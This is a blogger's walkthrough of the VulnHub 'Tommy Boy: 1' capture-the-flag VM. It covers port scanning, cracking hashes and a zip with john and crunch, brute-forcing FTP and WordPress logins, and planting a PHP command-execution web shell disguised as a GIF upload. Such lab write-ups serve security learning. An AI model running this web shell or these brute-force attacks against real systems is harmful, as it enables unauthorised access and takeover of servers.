Tommy Boy: 1

I decided to take a break from the exploit-exercises levels and tackle a boot to root challenge from vulnhub.com. The newest VM on their list today is called Tommy Boy:1. Here is the description

Description
=================

HOLY SCHNIKES! Tommy Boy needs your help!

The Callahan Auto company has finally entered the world of modern technology and stood up a Web server for their customers to use for ordering brake pads.

Unfortunately, the site just went down and the only person with admin credentials is Tom Callahan Sr. - who just passed away! And to make matters worse, the only other guy with knowledge of the server just quit!

You'll need to help Tom Jr., Richard and Michelle get the Web page restored again. Otherwise Callahan Auto will most certainly go out of business :-(

Notes
=================

The primary objective is to restore a backup copy of the homepage to Callahan Auto's server. However, to consider the box fully pwned, you'll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message.


I love the movie Tommy boy so this should be fun.  To start the challenge I download the .ova file and import it to virtual box.  As usually I set it’s network settings so it can not access my host machine or the internet.  The vm obtains the IP address 10.5.5.107 from my Kali machines DHCP server and I begin with a nmap scan. I use the -p option to specify all tcp ports, -A to run all tests, and -n because I don’t want to check DNS.

nmap -n -A -p 1-65535 10.5.5.107
Starting Nmap 7.00 ( https://nmap.org ) at 2016-07-30 11:00 EDT
Nmap scan report for 10.5.5.107
Host is up (0.00046s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries 
| /6packsofb...soda /lukeiamyourfather 
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
65534/tcp open  ftp     ProFTPD
MAC Address: 08:00:27:95:F7:55 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 10.5.5.107

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds

According to the scan the target server is running ssh on port 22, a web server on port 80 and 8008, and a FTP server on port 65534. One of the nmap scripts also went ahead and output the contents of robot.txt for the web servers. Robots.txt is a list of pages on a web server that you do not want web crawlers to look at. One of the pages from robots.txt on the port 80 web server looks promising “/flag-numero-uno.txt”. So I pull down that pages content.

wget -qO- 10.5.5.107/flag-numero-uno.txt
This is the first of five flags in the Callhan Auto server.  You'll need them all to unlock
the final treasure and fully consider the VM pwned!

Flag data: B34rcl4ws

It looks like I am off to a good start. The first flag is always easy. I checkout the rest of the pages in robots.txt using firefox but they turn out to just server pictures from the movie and don’t turn up anything interesting.

My next step is to visit the homepage on the port 80 server.

Tommy_Homepage_80

Yup their server is broken!  I checkout the source code of the page to see if there is anything interesting and I find a commented out conversation in the HTML.

<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="FF3339"><H2>SYSTEM ERROR!</H2></font>
If your'e reading this, the Callahan Auto customer ordering system is down.  Please restore the backup copy immediately.
<p>
See Nick in IT for assistance.
</html>
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal.  Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8--> 
<!--Comment from Richard: Ah! How could I forget?  Thanks-->

It sounds like I need to go checkout the blog to find this important information that Tom was storing. I watch the youtube video and head to http://10.5.5.107/prehistoricforest/.

Tommy_wordpress_01

Nice I land in a wordpress blog.  What kind of a blog would use that ugly template….

Anyways some of these posts look interesting.  First Richard posts some password protected information, then Tommy asks what the password is.  There is 1 comment on Tommys post…

Tommy_comment

I need to checkout 10.5.5.107/richard but first I scroll through the blog to look at other posts and comments.  The first post is from Big Tom and has a single comment.  The comment is

Tommy_flag2

So I go pull down the second flag.

http://10.5.5.107/prehistoricforest/thisisthesecondflagyayyou.txt
You've got 2 of five flags - keep it up!

Flag data: Z4l1nsky

Nothing else in the blog looks interesting so I go checkout http://10.5.5.107/richard/ to try and find the password to get into the protected post. I just end up at a jpg file of Richard driving a car looking shocked. I think this scene in the movie is when they hit a deer with their car so I try guessing a few passwords. I got stuck here for a bit.

After scouring the image for info over and over again I finally noticed the user comment

exiftool shockedrichard.jpg
ExifTool Version Number         : 10.07
File Name                       : shockedrichard.jpg
Directory                       : .
File Size                       : 163 kB
File Modification Date/Time     : 2016:07:30 11:51:21-04:00
File Access Date/Time           : 2016:07:30 11:58:53-04:00
File Inode Change Date/Time     : 2016:07:30 11:51:21-04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Exif Byte Order                 : Little-endian (Intel, II)
Software                        : Google
Copyright                       : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Exif Version                    : 0220
User Comment                    : ce154b5a8e59c89732bc25d6a2e6b90b
Exif Image Width                : 1600
Exif Image Height               : 1029
XMP Toolkit                     : Image::ExifTool 9.97
Rights                          : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Creator Tool                    : Google
Profile CMM Type                : Lino
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : IEC
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Media-Relative Colorimetric
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : HP
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Current IPTC Digest             : adfc7551120fa16884c295b6d397931f
Envelope Record Version         : 4
Coded Character Set             : UTF8
Application Record Version      : 4
Copyright Notice                : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
IPTC Digest                     : adfc7551120fa16884c295b6d397931f
Image Width                     : 1600
Image Height                    : 1029
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1600x1029
Megapixels                      : 1.6

The user comment is probably something that was added to the image as a hint. It doesn’t look like a likely candidate for a password but I try it anyways just to be thorough. It does look like it could be an MD5 hash so I run john against it.

echo "ce154b5a8e59c89732bc25d6a2e6b90b" > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE2 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
spanky           (?)
1g 0:00:00:00 DONE (2016-07-31 11:37) 5.882g/s 8117p/s 8117c/s 8117C/s lacoste..spanky
Use the "--show" option to display all of the cracked passwords reliably
Session completed

That’s more like it. I try “spanky” and get into the protected post. Here are the contents

Michelle/Tommy,

This is f’d up.

I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup.  Unfortunately, only Big Tom had the passwords to log into the system.  I can’t find his passwords anywhere.  All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:

Hey Richy,

So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster.

Here’s everything I know:

    You guys are all hopeless sheep :-/
    The Callahan Auto Web site is usually pretty stable.  But if for some reason the page is ever down, you guys will probably go out of business.  But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.
        IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore.  Warning: Big Tom always forgets his account password.  Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called.  Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

    I left a few other bits of information in my home folder, which the new guy can access via FTP.  Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it.  Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for.  And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again.  Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

    You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password.  I removed my SSH access because I *DON’T* want you calling me in case of an emergency.  But my creds still work on FTP.  Your new fresh fish can connect using my credentials and if he/she has half a brain.

Good luck, schmucks!

LOL

-Nick

Michelle/Tommy…WTF are we going to do?!?!  If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!

-Richard

Well I did already identify the FTP server with my initial nmap scan. It looks like the credentials are “nickburns” with a simple password so I fire up a password attack with medusa. The attack failed at first because the ftp server was down. I setup a script to keep checking the server.

#/bin/bash
while :
do
	nc -nv 10.5.5.107 65534
	sleep 1
done

When the server finally came back up I started a medusa password attack.

medusa -h 10.5.5.107 -u nickburns -P /usr/share/wordlists/rockyou.txt -M ftp -n 65534

While medusa was trying over a million passwords I tried manually logging in to see if I could guess the password since it’s supposedly simple. The first password I try is the username and it works…  In retrospect I should have added the medusa options that try the username as a password and try a blank password.

nc -nv 10.5.5.107 65534
(UNKNOWN) [10.5.5.107] 65534 (?) open
220 Callahan_FTP_Server 1.3.5
USER nickburns
331 Password required for nickburns
PASS nickburns
230 User nickburns logged in

Once logged in I find a readme.txt file.

cat readme.txt
To my replacement:

If you're reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto.  HAHAHAHAHAAH! SUCKER!  This is the worst job ever!  You'll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine
from a flame thrower!

Anyway I'm not completely without mercy.  There's a subfolder called "NickIzL33t" on this server
somewhere. I used it as my personal dropbox on the company's dime for years.  Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.

Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the "NickIzL33t" folder as well.  But guess what?
He always forgets THAT password as well.  Luckily I'm a nice guy and left him a hint sheet.

Good luck, schmuck!

LOL.

-Nick

I found the hidden folder at http://10.5.5.107:8008/NickIzL33t but it serves up a useless page.

Tommy_dropbox

Nothing is hidden in the pages source code.  So I start looking for the encrypted .zip file. Nothing turns up so I decided to start playing with the http headers.  I used the burp proxy to intercept my requests to the webpage. When I examine the responses I realize that the webserver is replying to me with a 403 response (permission denied).  Since there are a bunch of Steve Jobs references I decide to change my User-Agent header to look like an iphone instead of firefox.

Tommy_IphoneHeader

I’m not getting a 403 response anymore and a different webpage greets me.

Tommy_PassedTest

So now I need to guess a particular URL on the server.  Dirbuster is a great tool for enumerating directories or files on a webserver.  First I needed to configure dirbuster to use the correct header.  I also configure burp to intercept all of my future browser requests and replace the header with the iphone option.

Tommy_dirbust

Next I tell dirbuster the directory that I care about, the wordlist to use, the file extention to add to checks, and I disable directory checking.  Then I kickoff the program and let it run through the wordlist.

Tommy_dirbuster_2

I crank up the threads to 175 so it can go faster and before too long I get a hit for the url fallon1.html

Tommy_dirbuster_3

I visit the fallon1.html to see what is there.

Tommy_fallon1

Nice.  I got the third flag.

THREE OF 5 FLAGS - you're awesome sauce.

Flag data: TinyHead

I also got an encrypted list of passwords, and a hint file to help crack the encrypted list.

Big Tom,

Your password vault is protected with (yep, you guessed it) a PASSWORD!  
And because you were choosing stupidiculous passwords like "password123" and "brakepad" I
enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!

Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:

* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one 
big chunk ok?  Heh, "big chunk."  A big chunk typing big chunks.  That's funny.

LOL

-Nick

This sounds like a job for crunch.  I use crunch to generate all possibilities for the password described in the hint.

crunch 13 13 -t bev,%%@@^1995 -o big_tom_dict.txt
Crunch will now generate the following amount of data: 812011200 bytes
774 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 58000800 

crunch:  29% completed generating output

crunch:  62% completed generating output

crunch:  93% completed generating output

crunch: 100% completed generating output

Next I extract the password hash from the zip file.

zip2john t0msp4ssw0rdz.zip >encrypted.hash
ver 14  efh 5455  efh 7875  t0msp4ssw0rdz.zip->passwords.txt PKZIP Encr: 2b chk, TS_chk, cmplen=332, decmplen=641, crc=DF15B771

Then fire of john to crack the hash using my generated wordlist.

john encrypted.hash --wordlist=big_tom_dict.txt
Loaded 1 password hash (PKZIP [32/64])
Warning: OpenMP is disabled; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
bevH00tr$1995    (t0msp4ssw0rdz.zip)
1g 0:00:00:09 DONE (2016-08-01 16:20) 0.09842g/s 1538Kp/s 1538Kc/s 1538KC/s bevH00re{1995..bevH00vy\1995
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now that I have the password I unzip the zip file and take a look at the contents.

cat passwords.txt
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ??? 
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

Next I have to get into bigtoms account on the company blog to take a look at his drafts. I start guessing queen song names… Then I realize this is probably a reference to the rockyou password list so I startup another password attack.
I don’t trust this “Username: bigtom(I think?)” so first I enumerate the users with wpscan

wpscan --url http://10.5.5.107/prehistoricforest/  --enumerate u
[+] Identified the following 4 user/s:
    +----+----------+-------------------+
    | Id | Login    | Name              |
    +----+----------+-------------------+
    | 1  | richard  | richard           |
    | 2  | tom      | Big Tom           |
    | 3  | tommy    | Tom Jr.           |
    | 4  | michelle | Michelle Michelle |
    +----+----------+-------------------+

I knew it. The real username is tom. Now I startup the password attack.

wpscan --url http://10.5.5.107/prehistoricforest/ --wordlist /usr/share/wordlists/rockyou.txt --username tom
Brute Forcing 'tom' Time: 00:08:55 < > (24669 / 14344393)  0.17%  ETA: 86:24:32
  [+] [SUCCESS] Login : tom Password : tomtom1


  +----+-------+------+----------+
  | Id | Login | Name | Password |
  +----+-------+------+----------+
  |    | tom   |      | tomtom1  |
  +----+-------+------+----------+

Now I can log into the Tom account on wordpress and take a look at his drafts.

Ok so Nick always yells at me for forgetting the second part of my "ess ess eight (ache? H?) password so I'm writing it here:

1938!!

Nick, if you're reading this, I DON'T CARE IF I"M USING THIS THING AS A PASSWORD VAULT. YOU TOOK AWAY MY STICKIES SO I"LL PUT MY PASSWORDS ANY DANG PLACE I WANT.

With this info I can ssh onto the server using the password fatguyinalittlecoat1938!!

ssh bigtommysenior@10.5.5.107
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-31-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

143 packages can be updated.
0 updates are security updates.


Last login: Thu Jul 14 13:45:57 2016
bigtommysenior@CallahanAutoSrv01:~$

I checkout big Toms home folder and find flag 4. I’m getting close now.

ls -al
total 40
drwxr-x--- 4 bigtommysenior bigtommysenior 4096 Jul  8 08:57 .
drwxr-xr-x 5 root           root           4096 Jul  7 00:17 ..
-rw------- 1 bigtommysenior bigtommysenior    0 Jul 21 17:47 .bash_history
-rw-r--r-- 1 bigtommysenior bigtommysenior  220 Jul  7 00:12 .bash_logout
-rw-r--r-- 1 bigtommysenior bigtommysenior 3771 Jul  7 00:12 .bashrc
drwx------ 2 bigtommysenior bigtommysenior 4096 Jul  7 00:16 .cache
-rw-r--r-- 1 bigtommysenior bigtommysenior  307 Jul  7 14:18 callahanbak.bak
-rw-rw-r-- 1 bigtommysenior bigtommysenior  237 Jul  7 15:27 el-flag-numero-quatro.txt
-rw-rw-r-- 1 bigtommysenior bigtommysenior  630 Jul  7 17:59 LOOT.ZIP
drwxrwxr-x 2 bigtommysenior bigtommysenior 4096 Jul  7 13:50 .nano
-rw-r--r-- 1 bigtommysenior bigtommysenior  675 Jul  7 00:12 .profile
-rw-r--r-- 1 bigtommysenior bigtommysenior    0 Jul  7 00:17 .sudo_as_admin_successful
cat el-flag-numero-quatro.txt
YAY!  Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.

Flag data: EditButton

But...but...where's flag 5?  

I'll make it easy on you.  It's in the root of this server at /5.txt

There are a few other interesting things listed in the home folder. Specifically callahanbak.bak, LOOT.ZIP, and .sudo_as_admin_succesful.

Next I take a look at the contents of the .bask file and it does look like the HTML needed to restore the Callahan website.

cat callahanbak.bak
<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="0000ff"><H2><center>SYSTEM STATUS: ONLINE</center></H2></font>
<H3>We're happy to be serving all your brakepad needs.</H3>
<p>
<center><img src="ca.jpeg"></center>
<p>
<p>
</html>
<!---->

Now I just need to replace the existing website with this backup copy. First I identify where on the server the website is stored.

ls /etc/apache2/sites-enabled/
000-default.conf  2.conf
cat /etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:80>
	# The ServerName directive sets the request scheme, hostname and port that
	# the server uses to identify itself. This is used when creating
	# redirection URLs. In the context of virtual hosts, the ServerName
	# specifies what hostname must appear in the request's Host: header to
	# match this virtual host. For the default virtual host (this file) this
	# value is not decisive as it is used as a last resort host regardless.
	# However, you must set it for any further virtual host explicitly.
	#ServerName www.example.com

	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html

	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn

	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

When I look in the /var/www/html folder it is full of hunders of sub folders. Very strange. It does have index.html though which contains the system error website. The file is owned by bigtommysenior so I should be able to replace it.

cp /var/www/html/index.html ~/
cp callahanbak.bak /var/www/html/index.html

I refresh the website and confirm that it’s restored.

Tommy_WebRestored

Perfect.  Now that I’ve completed that I just need to get flag #5 and probably root privileges on the server. They already told me where flag5 is so I check the permissions.

ls -al /
total 105
drwxr-xr-x  25 root     root      4096 Jul 15 12:35 .
drwxr-xr-x  25 root     root      4096 Jul 15 12:35 ..
-rwxr-x---   1 www-data www-data   520 Jul  7 15:36 .5.txt
drwxr-xr-x   2 root     root      4096 Jul  6 08:32 bin
drwxr-xr-x   4 root     root      1024 Jul 14 13:38 boot
drwxr-xr-x  19 root     root      4140 Aug  2 04:21 dev
drwxr-xr-x  92 root     root      4096 Jul 21 17:47 etc
drwxr-xr-x   5 root     root      4096 Jul  7 00:17 home
lrwxrwxrwx   1 root     root        32 Jul 14 13:38 initrd.img -> boot/initrd.img-4.4.0-31-generic
lrwxrwxrwx   1 root     root        32 Jul  6 23:59 initrd.img.old -> boot/initrd.img-4.4.0-28-generic
drwxr-xr-x  22 root     root      4096 Jul  6 11:01 lib
drwxr-xr-x   2 root     root      4096 Jul  6 11:01 lib32
drwxr-xr-x   2 root     root      4096 Jul  6 08:30 lib64
drwxr-xr-x   2 root     root      4096 Jul  6 11:01 libx32
drwx------   2 root     root     16384 Jul  6 08:30 lost+found
drwxr-xr-x   3 root     root      4096 Jul  6 08:30 media
drwxr-xr-x   2 root     root      4096 Apr 20 17:08 mnt
drwxr-xr-x   2 root     root      4096 Apr 20 17:08 opt
dr-xr-xr-x 190 root     root         0 Aug  2  2016 proc
drwx------   3 root     root      4096 Aug  2 04:21 root
drwxr-xr-x  26 root     root       900 Aug  2 04:22 run
drwxr-xr-x   2 root     root     12288 Jul  6 23:59 sbin
drwxr-xr-x   2 root     root      4096 Apr 19 09:31 snap
drwxr-xr-x   2 root     root      4096 Apr 20 17:08 srv
dr-xr-xr-x  13 root     root         0 Aug  2 04:21 sys
drwxrwxrwt   8 root     root      4096 Aug  2 04:31 tmp
drwxr-xr-x  12 root     root      4096 Jul  6 11:01 usr
drwxr-xr-x  15 root     root      4096 Jul 14 13:53 var
lrwxrwxrwx   1 root     root        29 Jul 14 13:38 vmlinuz -> boot/vmlinuz-4.4.0-31-generic
lrwxrwxrwx   1 root     root        29 Jul  6 23:59 vmlinuz.old -> boot/vmlinuz-4.4.0-28-generic

Well flag 5 is there but it’s owned by the user account www-data so I can’t access it. I try unzipping LOOT.zip but it’s password protected. I suspect that’s what the flag codes are for.

I know the www-data account is used to run the apache2 web server. I also know there is another website running on this server on port 8008. So I go checkout the other websites files.

cat /etc/apache2/sites-enabled/2.conf
<VirtualHost *:8008>
	# The ServerName directive sets the request scheme, hostname and port that
	# the server uses to identify itself. This is used when creating
	# redirection URLs. In the context of virtual hosts, the ServerName
	# specifies what hostname must appear in the request's Host: header to
	# match this virtual host. For the default virtual host (this file) this
	# value is not decisive as it is used as a last resort host regardless.
	# However, you must set it for any further virtual host explicitly.
	#ServerName www.example.com

	ServerAdmin webmaster@localhost
	DocumentRoot /var/thatsg0nnaleaveamark

	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn

	ErrorLog ${APACHE_LOG_DIR}/error2.log
	CustomLog ${APACHE_LOG_DIR}/access2.log combined
<Directory /var/thatsg0nnaleaveamark/>
    Require all granted
    AllowOverride All
    Options Indexes FollowSymLinks
</Directory>
	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

After taking a look in the /var/thatsg0nnaleaveamark folder I find that there was another subfolder in Nicks webpage called P4TCH_4D4MS.

ls -al /var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/
total 28
drwxr-xr-x 3 www-data www-data 4096 Jul 15 12:47 .
drwxr-xr-x 3 www-data www-data 4096 Jul 17 08:19 ..
-rw-r--r-- 1 root     root     1603 Jul 15 12:25 backupload.php
-rw-r--r-- 1 root     root      206 Jul 15 12:25 .htaccess
-rw-r--r-- 1 root     root      280 Jul 15 12:03 index.html
-rw-r--r-- 1 root     root     1615 Jul 15 12:47 upload.php
drwxrwxrwx 2 www-data www-data 4096 Jul 15 12:50 uploads

Maybe there is some flaw in this website that will let me access flag 5. I take a look at the website and it appears to be a tool used to upload images.

Tommy_uploader

I take a look at the page source and see that it submits requests to the uploads.php file on the server.

cat index.html
<!DOCTYPE html>
<html>
<body>

<form action="upload.php" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="fileToUpload" id="fileToUpload">
    <input type="submit" value="Upload Image" name="submit">
</form>

</body>
</html>

I did notice that there was an upload.php and a backupload.php file. I run a diff on the two files to see what is different.

diff backupload.php upload.php
40c40
< echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded."; --- >         echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to /uploads.";

It seems like the only real different is the output after a file is uploaded. One tells you where the files uploaded to, the other doesn’t. So next I take a look at the backupload.php file to see how it works.

$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = pathinfo($target_file,PATHINFO_EXTENSION);
// Check if image file is a actual image or fake image
//if(isset($_POST["submit"])) {
//    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
//    if($check !== false) {
//        echo "File is an image - " . $check["mime"] . ".";
//        $uploadOk = 1;
//    } else {
//        echo "File is not an image.";
//        $uploadOk = 0;
//    }
//}
// Check if file already exists
if (file_exists($target_file)) {
    echo "Sorry genius, that file already exists. ";
    $uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large - what a moron! .";
    $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed, douchenozzle! ";
    $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.  Want me to save your game of Minesweeper though? ";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded.";
    } else {
        echo "Sorry, there was an error uploading your file.  Have you tried rebooting or single-clicking on it? ";
    }
}

On line 17 the script checks to see if the file already exists. Then on line 22 the script checks the files size. Line 27 calls a function that checks if the uploaded file ends with .jpg .jpeg .png or .gif. This should be easy enough to bypass if I want to upload a file. Next I take a look at the .htaccess file to see if there are any settings unique to this folder.

cat .htaccess
BrowserMatchNoCase "iPhone" allowed
AddType application/x-httpd-php .gif
Order Deny,Allow
Deny from ALL
Allow from env=allowed
ErrorDocument 403 "<H1>Nick's sup3r s3cr3t dr0pb0x - only me and Steve Jobs can see this content</H1><H2>Lol</H2>"

Nick has setup a mime type for .gif files to allow php code. So I whip up some simple php code into a file that matches all of the rules in upload.php.

<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST["cmd"]);
    system($cmd);
    echo "</pre>$cmd<pre>";
    die;
}
?>

This PHP code just looks for a parameter called cmd to be passed in the url. Then it takes that parameter and executes it as a system command.

Next I used the webpages to upload my php code to the server. Now I can call the php page to execute commands.  Since the code will be run by the server it will use the account www-data.
Tommy_phpbackdoor
www-data has access to the final flag so I use this backdoor to read the flag5 file.
Tommy_flag5
With all of the flags gathered I should be able to extract loot.zip.

unzip -P B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack LOOT.ZIP
Archive:  LOOT.ZIP
  inflating: THE-END.txt 
cat THE-END.txt
YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next 
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec



Thanks and have a blessed week!

-Brian Johnson
7 Minute Security

I did contact the Author Brian Johnson and he seems like a great guy. I recommend checking out his podcast “Seven Minute Security”. This VM was just the right amount of challenge for me and was a good break from assembly debugging. It was maybe a little heavy on password attacks but had a great theme and some clever twists.  I look forward to doing more of these in the future.

Leave a Reply

Your email address will not be published. Required fields are marked *